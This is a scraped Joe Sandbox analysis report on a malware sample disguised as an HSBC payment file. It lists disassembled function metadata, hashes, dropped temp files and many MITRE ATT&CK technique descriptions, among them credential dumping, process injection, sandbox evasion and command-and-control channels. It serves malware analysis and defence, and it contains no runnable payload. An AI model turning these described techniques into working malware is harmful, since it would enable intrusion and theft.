Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ca18f7154e6c89f4765eabcba2d4f5f5231103ac3431289f8a83295d0961eef0
Instruction ID: c8f2b1a32817fa13f18e120796a2d4ea8f4a8afdb1e3571235bb788be13dce67
Opcode Fuzzy Hash: ca18f7154e6c89f4765eabcba2d4f5f5231103ac3431289f8a83295d0961eef0
Instruction Fuzzy Hash: E9D0C975784311B6E6A4BBB0AC4FF966A64BB41B50F004825F24AAA1D0C9E89810C668

Function 007A5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A59AE
PostMessageW.USER32(00000000), ref: 007A59B5

Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC

Strings

Shell_TrayWnd, xrefs: 007A59A7

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d60f2e7a7c3a78227c365101c86a3e9308eb4dc25d80b66055472354e549962f
Instruction ID: 9a0eb6bb43ab48a300b7ed1e21880a2d231199d1bfe1b3c66b731766666a5889
Opcode Fuzzy Hash: d60f2e7a7c3a78227c365101c86a3e9308eb4dc25d80b66055472354e549962f
Instruction Fuzzy Hash: 28D0C9717C0311BAE6A4BBB0AC4FF966664BB45B50F004825F246AA1D0C9E8A810C668

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rHSBCBank_Paymentswiftcpy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1n436243

C:\Users\user\AppData\Local\Temp\aut25C.tmp

C:\Users\user\AppData\Local\Temp\renowner

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
rHSBCBank_Paymentswiftcpy.exe

Function 00723B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 007249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00724E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00789155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0072301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00723041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0072708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00723633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00723A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00723766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0072F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 01F825E0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 007239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01F823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre